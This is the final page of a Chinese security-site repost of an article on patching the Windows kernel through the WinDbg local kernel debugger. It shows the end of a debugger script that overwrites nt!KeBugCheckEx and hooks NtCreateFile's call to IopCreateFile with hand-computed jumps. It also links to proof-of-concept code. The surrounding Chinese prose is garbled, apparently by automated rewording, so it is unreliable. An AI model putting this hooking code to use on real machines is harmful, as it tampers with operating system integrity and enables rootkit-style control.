欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

运用WinDbg内核本地调试器攻破Windows系统内核

来源:本站整理 作者:佚名 时间:2017-09-26 TAG: 我要投稿
   $$ fffff803f84604f 488b8424d8000000 mov rax,qword ptr [rsp+0D8h]
   $$ fffff803f846057 498943c0 mov qword ptr [r11-40h],rax
   $$ fffff803f84605b 8b8424d0000000 mov eax,dword ptr [rsp+0D0h]
   $$ fffff803f846062 89442440 mov dword ptr [rsp+40h],eax
   $$ fffff803f846066 8b8424c8000000 mov eax,dword ptr [rsp+0C8h]
   $$ fffff803f84606d 89442438 mov dword ptr [rsp+38h],eax
   $$ fffff803f846071 8b8424c0000000 mov eax,dword ptr [rsp+0C0h]
   $$ fffff803f846078 89442430 mov dword ptr [rsp+30h],eax
   $$ fffff803f84607c 8b8424b8000000 mov eax,dword ptr [rsp+0B8h]
   $$ fffff803f846083 89442428 mov dword ptr [rsp+28h],eax
   $$ fffff803f846087 488b8424b0000000 mov rax,qword ptr [rsp+0B0h]
   $$ fffff803f84608f 49894398 mov qword ptr [r11-68h],rax
   $$ fffff803f846093 e808000000 call nt!IopCreateFile (fffff803ef8460a0) 
 
   $$ to do it easier, we will hook the call to nt!IopCreateFile. This call is at nt!NtCreateFile + 0x73
  
   $$ in the code that we have written in KeBugCheck, we have to put a jmp to continue the execution
   $$ at nt!IopCreateFile (after the 90 90 90 90 90 90 90 90 that we wrote). Remember that E9 instruction
   $$ is a relative jump and the value that the instruction admits as parameter is the difference of:
   $$ target_address - (E9_ins_address+5).
   $$ We need to have precalculated (nt!IopCreateFile)-(nt!KeBugCheckEx+8+5) = 0x002eb6f3 because !eb
   $$ needs that we pass immediate values
 
   r $t1 = phaKeBugCheckEx
   r $t1 = $t1 + 8
   !eb $t1 E9 f3 b6 2e 00
   $$ finally hook the call nt!IopCreateFile, it will be executed the next time that NtCreateFile was called and it
   $$ will jmp to our code. We need precalculate the relative jump value: (nt!KeBugCheckEx-(nt!NtCreateFile+0x73+5)) = 0xffd14908
   $$ because !eb needs we pass inmediate values (i have to research to avoid needing to have these values precalculated)
 
   r $t1 = phaNtCreateFile
   r $t1 = $t1 + 0x74
   !eb $t1 08 49 d1 ff
 }
 ad *
}
5)观点验证代码
这里,咱们曾经经由过程后面部门中先容的一切办法创立了一个观点验证代码。您可以或许经由过程下面的链接下载观点验证代码和响应的二进制文件:
https://github.com/vallejocc/patch_kernel_from_batch

上一页  [1] [2] [3] [4] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载